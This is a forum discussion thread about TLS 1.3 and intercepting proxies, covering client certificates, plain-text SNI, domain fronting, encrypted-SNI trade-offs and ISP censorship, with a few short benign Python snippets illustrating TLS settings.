But what bothers me, is I keep asking myself the question: When and why did we decide to give the proxy all the power in this relationship?

If we have to use proxies, at least the proxy should be transparent about itself to all parties on the connection. Then my bank can drop the connection or restrict functions/data to non-proxied data, secure government servers can drop the connection, my browser can drop the connection and give me an error (because I don't want anyone snooping on my banking history), etc.

E.g., let's say I open the patient portal for my hospital through a proxy. Is the proxy software HIPAA compliant? What about the people that have access to my health data through the proxy software? In this case, I would think we should allow the portal software to drop the connection because the connection itself is not secure.


> In this case, I would think we should allow the portal software to drop the connection because the connection itself is not secure.

It sounds like what you want is the server authenticating the client. That already exists in TLS: it's called a client certificate (complementing the usual server certificate, which authenticates the server to the client).

Unless the MITM proxy has access to the client certificate's private key, or the server trusts the MITM proxy's CA, the proxy cannot impersonate the client.
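As a rough sketch of server-side client-certificate enforcement with Python's ssl module (the commented-out file paths are hypothetical):

```python
import ssl

# A server context that demands a client certificate. With
# CERT_REQUIRED, the handshake fails unless the peer presents a
# certificate signed by a CA the server trusts; an intercepting proxy
# that lacks the client's private key cannot complete it.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.verify_mode = ssl.CERT_REQUIRED
# ctx.load_cert_chain("server.pem", "server.key")      # server identity
# ctx.load_verify_locations("client-ca.pem")           # CA signing client certs

print(ctx.verify_mode == ssl.CERT_REQUIRED)
```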


Is any B2C mainstream bank using client certificates? I've not seen it in the wild. I think easier solution is just BYOD to work with 3g/4g SIM, you can pick up a reasonable 8" tablet for $100 that supplements your phone for when you need a bigger screen size.


”Is any B2C mainstream bank using client certificates?”

I doubt it. AFAIK the web browsers’ UI for handling client certificates is way too cumbersome for mainstream usage.


One of the nice things in TLS 1.3 that we might never end up using in anger but is there if we want it is the request from a server for a client certificate now gets to express arbitrary constraints.

In TLS 1.2 you could only express a list of CAs whose signatures you trust (this is one of the most widely misconfigured settings in OpenSSL-based software, telling OpenSSL you _trust_ some CA to identify clients when actually you meant to say your server certificate is _signed_ by that CA)

In TLS 1.3 you can write out arbitrary constraints, although somebody will need to define any new ones in a separate ID or RFC. So this might simplify the end user experience down the road because the browser can do enough matching to just hand over the correct certificate automatically.

Or it might never get used on the public Internet, oh well.


The point I was really making was one about transparency. Many people don't know their connection is insecure. They see the green link status on chrome and everything is good.

If the server detects an insecure connection, then at least the minimum is that the user is informed.


I'll reiterate what I said before. I'm for TLSv1.3 breaking middleboxes.

It's more important to have good viable security rather than "my middleboxes". To me, it's like the FBI asking for NOBUS crypto.


The side effect of this is that corporate networks will become draconian in what services can be accessed from their networks. Expect everything outside of 10./8 to be black holed; No internet access of any kind. The company's legal requirement to prevent data exfiltration trumps your ability to browse reddit during your lunch break. Plus, if they can't monitor the connection, they will monitor the endpoint.


The reality is that corporations always exist under a tension between an inclination to forbid everything, for fear it will cost the company money or reputation, and a need to allow everything so that people can get their jobs done or are willing to work there.

The Internet is nothing special in this respect, large companies struggle to make policies that cover all the bases without strangling themselves and they will err on both sides of the line, sometimes learning from their mistakes and sometimes not so much.


If only everyone with a job and most people without one had some kind of personal network device, compact enough to be kept in a pocket or purse yet powerful enough to "browse reddit"...

Lots of corporate networks probably should be locked down to that extent. If they can't set up their own CA they're probably not doing a great job protecting their customers' private information.


I don't get your comment. They should monitor the endpoint, of course. I guess it has to be legal (in some countries it is not) and written in your work contract.

How do you think Google found out Levandowski was stealing blueprints? Definitely not by meddling between TLS endpoints.


I doubt this, but if it happened, would there be any downside? Your lunch break browsing deserves privacy too and you should do it on your own device (or own hotspot at the very least).


Most places monitor the endpoint already.


A regular (non-transparent) HTTP proxy like Squid will process HTTP requests internally, but clients use CONNECT to forward their raw connection to the remote site for HTTPS. This is good: it means the client establishes a TLS connection with the origin.

It would be really helpful, though, if there were an operating mode wherein one could instruct the proxy to talk to an HTTPS server without using CONNECT. So the browser talks to the proxy over TLS, and displays the proxy's certificate details, possibly with a big red warning, and the proxy terminates that TLS connection, decides what to do based on the request, makes a new onwards connection and gets the response plaintext too.

The user obviously loses some privacy guarantees here, but no more than with an intercepting "transparent" proxy, and it's much clearer what's actually happening and which devices the user needs to trust. I'm much happier with an explicit proxy than any attempts at a transparent proxy that I've encountered, not least because it makes it possible for the browser to be clear to the user about what's happening.
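The existing CONNECT behaviour described above can be sketched with Python's http.client (the proxy host and port here are made up):

```python
import http.client

# What browsers do today with an explicit proxy: open a TCP connection
# to the proxy, issue "CONNECT example.com:443", then run TLS
# end-to-end with the origin through the resulting tunnel.
conn = http.client.HTTPSConnection("proxy.corp.example", 3128)
conn.set_tunnel("example.com", 443)  # CONNECT target for the proxy

# No bytes are sent until a request is made; the proxy only ever sees
# the tunnel endpoint, not the plaintext of the TLS session inside it.
print(conn.host, conn.port)
```

The mode the commenter wishes for would instead have the client send the full request to the proxy over its own TLS session, with no CONNECT step, so the proxy terminates TLS and sees the plaintext.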


Some religious nuts are preventing me from visiting Wikipedia. I use encrypted DNS to protect myself from man-in-the-middle attacks, and it helps. But then they intercept the certificate's name and drop the connection. So, does this mean that TLS 1.3 will prevent sniffing the certificate's name? And there won't be any certificate fingerprint on the wire to be sniffed, right?


Under TLS 1.3 the Server Name Indication extension becomes mandatory, so your client will automatically, in plain text, transmit the full DNS name of whatever server it wants to talk to

[SNI is there to make "virtual hosting" possible for HTTPS, which is why you can get working SSL on a cheap bulk host without paying them extra for a dedicated IP address]

So, a middlebox might choose to drop connections based on the name your client sends (and of course it could also choose to drop them based on the destination IP address, the amount of traffic you've sent recently, or the phase of the moon). But the certificate itself is now always encrypted, so the middlebox can't snoop that without acting as a proxy.
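The plain-text SNI field is just the server_hostname a client supplies. A quick sketch with Python's ssl module (no network traffic is generated here):

```python
import socket
import ssl

ctx = ssl.create_default_context()

# When the handshake runs (on connect), "en.wikipedia.org" is placed
# in the ClientHello's SNI extension, unencrypted, visible to any
# middlebox on the path.
sock = ctx.wrap_socket(socket.socket(), server_hostname="en.wikipedia.org")

print(sock.server_hostname)
```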

It sounds as though you've (perhaps against your will) accepted the proxy, so in that case all bets are off anyway, a proxy can do whatever it likes, if you don't want that don't trust proxies.


> your client will automatically, in plain text, transmit the full DNS name of whatever server it wants to talk to

AIUI, it's slightly better than this, because you only actually need to send the name of some domain that the server can serve, not necessarily the one you actually want to talk to. If the domain is on Cloudfront, App Engine, Heroku, etc, that means you can choose one of a billion innocuous sites to use for SNI, before connecting to the one you actually want.

This is called 'domain fronting':

https://www.bamsoftware.com/papers/fronting/

I can't quite work out the trust algebra of this, though. You don't have any cryptographic guarantee that you're connecting to the right site. But you can be sure that you're connecting to whichever server hosts the site whose name you're taking in vain. But if that server was able to serve your site all along, because it had its private key, did you ever really have any guarantee?

Probably won't help for Wikipedia, though, as they're not behind a CDN.


Wikipedia summary of domain fronting: https://en.wikipedia.org/wiki/Domain_fronting


But browsers don't do this, and don't have any channel to look up these DNS mappings.


> Under TLS 1.3 the Server Name Indication extension becomes mandatory

Is the client allowed to not send an SNI? If not, does this mean that HTTPS servers will no longer have a "default" HTTPS virtual host if accepting only TLSv1.3 connections?

If you don't get to know anything about the backend at an IP until you've essentially proven you have a shared secret (the domain name), this could be a bad time for the folks who try to scan IP address space for HTTPS sites (e.g. the DDoSers who want to de-anonymize Cloudflare-protected backends in order to attack them directly.)


The SNI extension is a MUST in the TLS 1.3 standard. Of course this is not a law of physics, it's perfectly possible to implement a client which doesn't send this extension but the standard says to do this, so implementations which reject your connection for being non-standard might exist, might even become popular. You can reject connections that lack SNI even today if you want, it's just that the most popular web server software has the "default" behaviour you described, but that's not mandatory or unavoidable.

Anyway, it is unlikely that TLS 1.3 will be popular enough to reject TLS 1.2 connections in the next, say, five years unless there's some monumental security problem that makes TLS 1.2 moot.


So if middleware can just snoop the SNI and filter (e.g. Wikipedia) on that, doesn't that negate any of the supposed privacy improvements of TLS 1.3? Other people in this thread seem to think that it provides more protection against MITM and snooping from middleware than did 1.2. How is that supposed to work?


There's a couple of things to keep in mind. First, all major browsers (and many other TLS clients too) have been using SNI for more than a decade now, so it's not so much that TLS 1.3 makes things worse, it just better reflects the implementation reality. Second, even in a hypothetical world without SNI, anyone watching the traffic would still see the IP the client is talking to. For a large percentage of web traffic, that IP address can easily be associated with exactly one domain, and for the rest - shared web hosts, things behind CDNs, etc. - you still have the response size to work with, which you can use to make a fairly good guess as to what the domain is.

Of course it's usually even simpler than that because you can just look at DNS lookups which overwhelmingly don't use transport-level encryption today.


I was told that DNS was the reason for keeping the SNI unencrypted. I.e., encrypting SNI is tricky and doesn't help if DNS reveals what you are doing anyway.

The DNS community is now trying to move to DNS over TLS. Once that is wide spread, there is hope that a future TLS version will encrypt SNI.

Note that if you do DH before sending the SNI then it requires an active attack to figure out the SNI. However that will make life very difficult for server-side proxies that try to route traffic based on SNI.


Encrypting SNI would come at a cost

TLS 1.3 provides 1RTT encryption by having clients speculate that the server is modern. The client opens by saying "OK, I assume you know how to do this key exchange and here are my parameters". If the server actually does _not_ know the flavour of key exchange proposed, it sends a retry message, explaining what it does know instead and we're immediately paying an extra round trip cost.

SNI travels in that first message from the client, but if we are to encrypt it with the DH key we can't send it until the client knows that key, which means we again pay an extra round trip.

You might think hold on, surely we can immediately start our transaction because we have the encryption keys now, so we're not paying an extra round trip. Nope, we mustn't start the transaction until we've seen the server's certificate, so we have to wait an entire extra round trip.

The best option if we want to really encrypt SNI is to have servers able to choose to go early, so you'd connect without SNI, and then after finishing DH the server could choose to either immediately send certificates (so it can't serve different sites this way) or ask for the encrypted SNI first. This would mean it's 1RTT for www.google.com and 2RTT for another-cat-blog.example because the latter is on a cheap bulk host. That's... not great.

A way forward that's resistant to attack but isn't full encryption would be use of hashing, the client specifies only a hash of the hostname, not the plain name, and the server matches this against its known list of possible names. A snooper sees the hash, and can try to guess what it means, but if they have no idea they're out of luck.

We can make the snooper's life hard either in the protocol design itself (e.g. send password-style salted & pessimised hashes, so both the server and snoopers must recalculate for each connection) or in our naming (e.g. name the members only web site zqdm-48gb.example.com, not members.example.com) but this is far less comprehensive than full encryption.
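A toy sketch of that salted-hash idea in Python, purely illustrative and not any real protocol: the client sends a fresh salt plus a hash instead of the plain name, and the server (like any snooper) must recompute the hash for each candidate name on every connection.

```python
import hashlib
import os

# Client side: hash the desired hostname under a per-connection salt.
salt = os.urandom(16)
name = b"members.example.com"
hashed_sni = salt + hashlib.sha256(salt + name).digest()

# Server side: trial-match against the list of names it actually hosts.
# A snooper must do the same brute-force work over guessed names.
def matches(hashed, candidates):
    s, digest = hashed[:16], hashed[16:]
    return [c for c in candidates if hashlib.sha256(s + c).digest() == digest]

print(matches(hashed_sni, [b"members.example.com", b"blog.example.com"]))
```

The salt is what forces per-connection recomputation; without it, a snooper could precompute hashes for a dictionary of interesting hostnames once and match forever.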


Under the assumption that DNS will move to TLS, a future TLS will have to incur this cost.

It is nice to have 1RTT, but if at the same time you are leaking SNI, people are not going to be happy.

I'm curious how this hashing would work out. My gut feeling is that some security researcher will have a nice presentation along the line of 'nice hash function you have, here's how to break it'.


Given certificate pinning, could a client just encrypt the SNI message using the pinned cert (i.e. the server's X.509 public key)? Anything that can decrypt that message is the thing we wanted to talk to. If it can't, well, a pinned-cert failure is uncommon enough to warrant an extra round-trip, even if the client wants to allow it.


There are a bunch of problems with this idea:

* It is common to pin a certificate for which you don't have the corresponding private key, and so you would not be able to decrypt the message. Examples: Pinning an intermediate from a CA you use, or their root, pinning a "backup" that you have on paper just in case but isn't live

* Pinning is a serious foot gun and a hostage risk (bad guys take over your site for one day, it seems normal but pins _their_ key, then they tell you to pay them $1M for the key or else, your users are locked out until you pay), so it is being deprecated for the public Web.

* Which key? The whole point of SNI is that we tell the remote server which site we're interested in, and then it chooses the keys and certificate accordingly. So with your approach the server must use trial-and-error to eliminate all the keys that don't work first, it barely matters what's actually inside the SNI message, if you can decrypt it then you've already found the right site...


> Anyway, it is unlikely that TLS 1.3 will be popular enough to reject TLS 1.2 connections in the next say

Sure, most servers won't be able to take advantage of this. But if your server is using TLS only to speak to your reverse-proxy over the public Internet (e.g. if you're operating a Cloudflare-protected site where the TLS is terminated at Cloudflare and then a separate TLS connection is made from Cloudflare to your backend), you might be able to take full advantage of this as soon as your reverse-proxy's client logic supports TLSv1.3.


> SNI is there to make "virtual hosting" possible for HTTPS, which is why you can get working SSL on a cheap bulk host without paying them extra for a dedicated IP address]

At least for those that are stuck on IPv4, which is unfortunately a majority.


IPv6 without SNI won't really fix the censorship issue anyway. If you're not using a shared host with SNI, the proxy can just query the host at the IP address you're attempting to access and see what it responds with, since that IP will only be serving one domain.


Well, it is not a proxy but the biggest ISP in Turkey.


Active MITM remains able to sniff certificates, because the certificate is exchanged (indeed, must be exchanged) before you can authenticate the key exchange and thus lock out AMITM attackers.


Is it possible to launch an active MITM attack and then establish the connection like it wasn't there? The point of sniffing the certificate is to block access to some websites and allow others located on the same IP address. Otherwise you could just block the IP.


Why intercept certificate if you can block IP?


IPs are often used by many sites: it’s like telling the post office to drop mail to 1234 5th St when that’s an apartment building with hundreds of residents. If you block a major CDN you’ll take out things like Microsoft, Apple, etc. and generate a lot more publicity for your censorship program.


Because Wikipedia has many IPs and they change from time to time.

And the best part is when Russians were blocking a blogger's web site based on IP, he switched his IP to a bank's web site and thus the bank's IP was blocked automatically :)


Sounds strange that a bank would host its website on a shared IP address.


They didn't.

To clarify: the blogger set his domain to point to the bank's IP address. The automated domain blocking system resolved his domain and blocked "its IP" without confirming that the IP actually belonged to the targeted site.


That's absolutely glorious.


The author states:

"The heuristics are necessarily imprecise because TLS extensions can change anything about a connection after the ClientHello and some additions to TLS have memorably broken them, leading to confused proxies cutting enterprises off from the internet."

Can someone elaborate on a specific instance of this where a TLS extension led to breakage? I don't doubt the author, quite the opposite - I'm interested in reading more about the specifics of it.


Am I the only one noticing parallels between this debate and the debate over gun regulation in the US? Concerns that firearms or privacy are fundamental rights. Concerns that restrictions, whether on the inspectability of destinations or on access to firearms, are necessary for others' safety. Even the distrust of the government comes up in both debates.

I have no actionable feedback from the parallels, just fascination.


Why not have the insecure or interceptable protocols as optional protocol extensions and make everyone happy? Much like with FIPS, and how you can build OpenSSL and other TLS libs with FIPS mode on or off.

TLS 1.3 client libraries could then optionally support interceptable key exchange depending on who is using them. An individual can use a normal OS and distro that exclude the insecure features, while banks and military facilities might turn it on.

Alternatively, why the "one size fits all" approach? Why not have a "TLS-commercial"? Obviously the "one size fits all" approach requires a compromise by all parties, resulting in a collective reduction of security.


> Why not have the insecure or interceptable protocols as optional protocol extensions and make everyone happy?

That sounds like the "draft-rehired" proposal. Here's a list of arguments against it (and similar proposals): https://github.com/sftcd/tinfoil



I have disliked the arms race against middleboxes since the beginning.


I remember when TLS was about security, not privacy. I also remember when proxies were a tool to help everyone, not just corporations who wanted to inspect all your traffic.

By ensuring that HTTPS is used everywhere, and that no other security regimes are allowed, they've killed proxies for all uses except spying on users. The end result is some of the Internet is now less private, by design.

If you think proxies are a useful tool to save bandwidth, decrease latency and reduce load, and want to stay secure, but not necessarily private, there are very obvious ways this can be done. But there are people literally fighting against this because they want privacy or nothing.

This is Internet puritanism.


Explicit proxies are no problem. There are a lot of servers behind proxies. No problem there.

There is plenty of client software that can be configured to use proxies. Also no problem there.

Where it goes wrong is transparent proxies (also called 'middleboxes') that operate without consent of the endpoints. In general, those proxies have caused so many network problems that most people involved in the IETF will happily see them die.

And the easiest way to do that is to encrypt all traffic.


There's a large number of web users - like myself - who benefited from transparent proxies. The IETF's complaints are almost certainly due to incompatibilities between products and erroneous modification of streams in transit, which of course should not happen. But it certainly doesn't need to die - if we killed technology for that, the whole WWW wouldn't exist.



